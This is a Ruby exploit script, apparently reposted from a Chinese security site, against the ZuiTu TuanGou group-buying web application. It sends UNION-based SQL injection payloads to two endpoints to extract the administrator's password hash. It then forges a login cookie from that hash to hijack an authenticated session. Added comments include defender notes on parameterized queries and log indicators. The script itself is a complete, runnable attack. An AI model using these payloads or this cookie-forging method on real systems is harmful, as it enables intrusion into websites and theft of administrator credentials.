
ZuiTu TuanGou System Injection Exploit

2013-03-24 01:25
这次获取 hash 用的不是盲注,而是联合查询(UNION)注入:查询结果直接回显在响应页面中,脚本再从响应正文里提取 hash。


 


require "net/http"
require "uri"
require 'digest/md5'

# Banner printed once at start-up: title, author and blog of the script.
doc = <<BANNER
-------------------------------------------------------
ZuiTu TuanGou System Inejction Exploit
Author:ztz www.hackdig.com
Blog:http://ztz.fuzzexp.org/
-------------------------------------------------------

BANNER

# Help text; $0 is interpolated so the message shows the script's own name.
usage = <<USAGE
Usage: ruby #{$0} host port path
example: ruby #{$0} demo.zuitu.com 80 /
USAGE

# Issue a plain-HTTP GET for +url+ and hand back the response body.
#
# @param url [String] absolute URL to fetch
# @param cookie [String] only its length is inspected: when it is non-empty the
#   Cookie header is filled from the global $cookie, not from this argument
# @return the body of the HTTP response
#
# NOTE(review): a top-level method named `send` shadows Kernel#send for every
# object in the process; a distinct name would avoid surprising library code.
def send(url, cookie='')
  target = URI(url)
  get = Net::HTTP::Get.new(target.request_uri)
  # Header value deliberately mirrors the original: it comes from $cookie.
  get.initialize_http_header({"Cookie" => "#{$cookie}"}) unless cookie.length == 0
  Net::HTTP.new(target.host, target.port).request(get).body
end

# Base64-encode +bin+ using Array#pack with the "m" directive.
# As with any pack("m") output, the result is line-wrapped and a non-empty
# result ends with a newline character.
def encode64(bin)
  wrapped = [bin]
  wrapped.pack("m")
end

# Requests two application endpoints whose query string already carries a
# UNION-based SQL injection payload: the `secret` parameter of
# ajax/chargecard.php first, then the `num` parameter of api/call.php as a
# fallback. Every 32-character word run found in the response body is stored
# in the global $password (an Array, empty when nothing matched).
#
# The injected SELECT concatenates username, "=" (CHAR(0x3d)) and password for
# the row with id=1 of the `user` table, so a match is presumably that
# account's stored password hash -- the regex itself only checks the length.
#
# Reads the globals $host, $port and $path; writes $password.
#
# Defender notes: the payload can only succeed if these two parameters are
# concatenated into a SQL statement by the application; the remedy is
# parameterized queries and strict validation on both endpoints. In access
# logs, `union`, `select` or `concat(` (here padded with `%2F**%2F`, an encoded
# `/**/` comment) inside `secret` or `num` is a strong indicator of this probe.
def getpassword

exp1 = "http://#{$host}:#{$port}/#{$path}ajax/chargecard.php?action=query&secret=')%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2Cconcat(username%2CCHAR(0x3d)%2Cpassword)%2C4%2C5%2C9999647600%2F**%2Ffrom%2F**%2Fuser%2F**%2Fwhere%2F**%2Fid%3D1;%23"
exp2 = "http://#{$host}:#{$port}/#{$path}api/call.php?action=query&num=1')%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2C3%2Cconcat(username%2CCHAR(0x3d)%2Cpassword)%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2F**%2Ffrom%2F**%2Fuser%2F**%2Fwhere%2F**%2Fid%3D1%3B%23"

# scan returns an Array of all matches, not a single string.
$password = send(exp1).scan(/\w{32}/)

# Second endpoint is tried only when the first response held no match.
if $password.length == 0

$password = send(exp2).scan(/\w{32}/)

end

end

# Builds a login cookie from the hash held in $password, sends it to
# index.php, and stores the PHPSESSID fragment of the Set-Cookie response
# header in the global $session.
#
# Cookie layout as constructed here:
#   name  = first 4 hex characters of MD5($host) followed by "_ru"
#   value = Base64 of "1@" + the joined contents of $password
#
# Reads the globals $host, $port, $path and $password; writes $cookie and
# $session.
#
# Defender notes: the script assumes the application accepts a "remember me"
# style cookie derived from a user id and the stored password hash (TODO
# confirm against the application source). Where that holds, anyone who can
# read the hash can authenticate without cracking it. Persistent-login tokens
# should be random, stored server-side and revocable, never derived from
# credential material; after a suspected leak, reset the affected passwords so
# previously derived cookies stop validating.
def getsession

cname = Digest::MD5.hexdigest($host)[0, 4] + "_ru"
cvalue = "1@" + $password.join()

$cookie = cname + "=" + encode64(cvalue)

puts "[*]cookie: #{$cookie}"

uri = URI("http://#{$host}:#{$port}/#{$path}index.php")

http = Net::HTTP.new(uri.host, uri.port)

request = Net::HTTP::Get.new(uri.request_uri)
request.initialize_http_header({"Cookie" => "#{$cookie}"})

response = http.request(request)

# Keeps only the "PHPSESSID=...;" portions of the Set-Cookie header.
$session = response["Set-Cookie"].scan(/PHPSESSID=\w+;/).join()

end

# Script entry point: print the banner, then either show the usage text
# (fewer than three arguments) or run the two stages in order.
puts doc
if ARGV.length < 3

puts usage

else

# Command-line arguments are kept as strings in globals that the helper
# methods read directly.
$host = ARGV[0]
$port = ARGV[1]
$path = ARGV[2]

puts "[*]get administrator's hash..."

# Stage 1: fills $password from the injection responses.
getpassword()

# Stop when neither endpoint returned a 32-character match.
if $password.length == 0
puts "[-]Can't get administrator's hash..."
exit
end

puts "[+]hash: #{$password.join()}"

puts "[*]Inject into cookie..."

# Stage 2: fills $cookie and $session.
getsession()

# Unlike the hash check above, this branch does not exit, so the final
# message below is printed even when $session is empty.
if $session.length == 0
puts "[-]can't get cookie!"
end

puts "[+]set this cookie: #{$session}"

end
知识来源: www.2cto.com/Article/201303/197461.html
